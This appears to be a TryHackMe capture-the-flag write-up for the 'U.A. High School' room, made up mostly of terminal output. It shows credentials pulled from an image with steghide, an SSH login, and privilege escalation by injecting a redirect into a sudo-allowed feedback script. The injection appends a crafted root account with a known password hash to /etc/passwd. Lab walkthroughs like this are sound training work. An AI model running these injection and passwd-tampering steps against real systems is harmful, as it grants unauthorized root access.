本机IP:10.17.5.121
目标ip:10.10.167.217信息搜集
403 bypass?
分析流量包
确实存在一个文件
进行模糊测试
webshell
立足点 getwebshell
反弹shell
转化为tty
kali@kali ~/Documents/thm/U-A-High-School
❯ hexeditor -b oneforall.jpg
kali@kali ~/Documents/thm/U-A-High-School
❯ thunar
kali@kali ~/Documents/thm/U-A-High-School
❯ steghide extract -sf oneforall.jpg
Enter passphrase:
the file "creds.txt" does already exist. overwrite ? (y/n) n
steghide: did not write to file "creds.txt".
kali@kali ~/Documents/thm/U-A-High-School [1]
❯ cat creds.txt
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:
deku:One?For?All_!!one1/Ausershell
❯ ssh deku@10.10.167.217
The authenticity of host '10.10.167.217 (10.10.167.217)' can't be established.
ED25519 key fingerprint is SHA256:OgRmqdwC/bY0nCsZ5+MHrpGGo75F1+78/LGZjSVg2VY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.167.217' (ED25519) to the list of known hosts.
deku@10.10.167.217's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-153-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 16 Nov 2024 06:35:11 AM UTC
System load: 0.0 Processes: 119
Usage of /: 47.0% of 9.75GB Users logged in: 0
Memory usage: 48% IPv4 address for eth0: 10.10.167.217
Swap usage: 0%
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
37 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Feb 22 21:27:54 2024 from 10.0.0.3
deku@myheroacademia:~$
rootshell
THM{W3lC0m3_D3kU_1A_0n3f0rAll??}
deku@myheroacademia:~$ sudo -l
[sudo] password for deku:
Matching Defaults entries for deku on myheroacademia:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User deku may run the following commands on myheroacademia:
(ALL) /opt/NewComponent/feedback.sh
可以写入任意命令
deku@myheroacademia:~$ sudo /opt//NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
test>/tmp/tet.txt
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ cat /tmp/tet.txt
手动制作一个密码
mkpasswd -m md5crypt -s
密码:admin
$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1
test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bashdeku@myheroacademia:~$ sudo /opt//NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
'test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bash' >> /etc/passwd
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ cat /etc/passwd
deku@myheroacademia:~$ tail -n1 /etc/passwd
test:$1$G0VpEiUX$xG8amhil.KWmevqLhCvsE1:0:0:test:/root:/bin/bash
deku@myheroacademia:~$ su test
Password:
root@myheroacademia:/home/deku# id
uid=0(root) gid=0(root) groups=0(root)
root@myheroacademia:~# cat root.txt
root@myheroacademia:/opt/NewComponent# cat /root/root.txt
__ __ _ _ _ _____ _
\ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___
\ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \
| | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/
|_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___|
_ _
_ _ ___ | | | |
| \ | | ___ / | | |__| | ___ _ __ ___
| \| |/ _ \/_/| | | __ |/ _ \ '__|/ _ \
| |\ | (_) __| |_ | | | | __/ | | (_) |
|_| \_|\___/|______| |_| |_|\___|_| \___/